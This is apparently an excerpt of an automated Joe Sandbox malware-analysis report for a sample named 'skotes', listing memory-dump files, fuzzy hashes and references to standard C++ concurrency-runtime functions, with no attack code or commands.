                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3844194624-0
                                                                                                                                                                                                                                                                • Opcode ID: bbdafa7aefe9f161ed3f2e00f70d41f04f41fe4ff3394577abe2a02e161cd64d
                                                                                                                                                                                                                                                                • Instruction ID: 239f7f78022b55e749c544394de53a876cc5ab02cf2e20f5f099c4a151ddeac9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbdafa7aefe9f161ed3f2e00f70d41f04f41fe4ff3394577abe2a02e161cd64d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7001D631600921AFDF157BA4CA92FADB7AABF49710302012DF91457617DB21FC6197E0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ListArray.LIBCONCRT ref: 00ACEE6A
                                                                                                                                                                                                                                                                • ListArray.LIBCONCRT ref: 00ACEE7C
                                                                                                                                                                                                                                                                  • Part of subcall function 00ACEF29: _InternalDeleteHelper.LIBCONCRT ref: 00ACEF3B
                                                                                                                                                                                                                                                                • ListArray.LIBCONCRT ref: 00ACEE86
                                                                                                                                                                                                                                                                • _InternalDeleteHelper.LIBCONCRT ref: 00ACEE9F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3844194624-0
                                                                                                                                                                                                                                                                • Opcode ID: 384ecb0f3e5022e0633de4f18b3473477edb3fd28a9306c9e146ccd2bb8bb577
                                                                                                                                                                                                                                                                • Instruction ID: 18eb9a8eec3ac0298d6111cd9cdeed5b50533548373cb83e505b67fe8f1b5cab
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 384ecb0f3e5022e0633de4f18b3473477edb3fd28a9306c9e146ccd2bb8bb577
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B018631600621BFCE25BB61DAC2EAEBB69BF49750306502DF81457612DB20FC2196E0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ListArray.LIBCONCRT ref: 00ACD0C5
                                                                                                                                                                                                                                                                • ListArray.LIBCONCRT ref: 00ACD0D7
                                                                                                                                                                                                                                                                  • Part of subcall function 00ACC6B2: _InternalDeleteHelper.LIBCONCRT ref: 00ACC6C4
                                                                                                                                                                                                                                                                • ListArray.LIBCONCRT ref: 00ACD0E1
                                                                                                                                                                                                                                                                • _InternalDeleteHelper.LIBCONCRT ref: 00ACD0FA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3844194624-0
                                                                                                                                                                                                                                                                • Opcode ID: e2cc5728ad1d660547296a93e70e49a8b84d3269c3755bba0389a5557181e125
                                                                                                                                                                                                                                                                • Instruction ID: 71a70e07e1fc57d72e9aa8c8e90d639e517b0411cdd00fc8e8add99c3a528077
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2cc5728ad1d660547296a93e70e49a8b84d3269c3755bba0389a5557181e125
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6401D631200521AFCE257B64CF92EADB7A9BF49720306513DF81497612DF20EC5196E0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00AD33DB
                                                                                                                                                                                                                                                                • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00AD33EF
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00AD3407
                                                                                                                                                                                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00AD341F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 78362717-0
                                                                                                                                                                                                                                                                • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                                                                                                                • Instruction ID: 47478744579472dae18e0ddbd63ba77272ae80a76babdc205ab1357a3a8337f1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7801D173A00514A7CF16EF658A41EEFB7A99F54750F10006BFD13AB382DA71EE0097A2
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00AC9519
                                                                                                                                                                                                                                                                  • Part of subcall function 00ABF4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00AC5486
                                                                                                                                                                                                                                                                • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 00AC953D
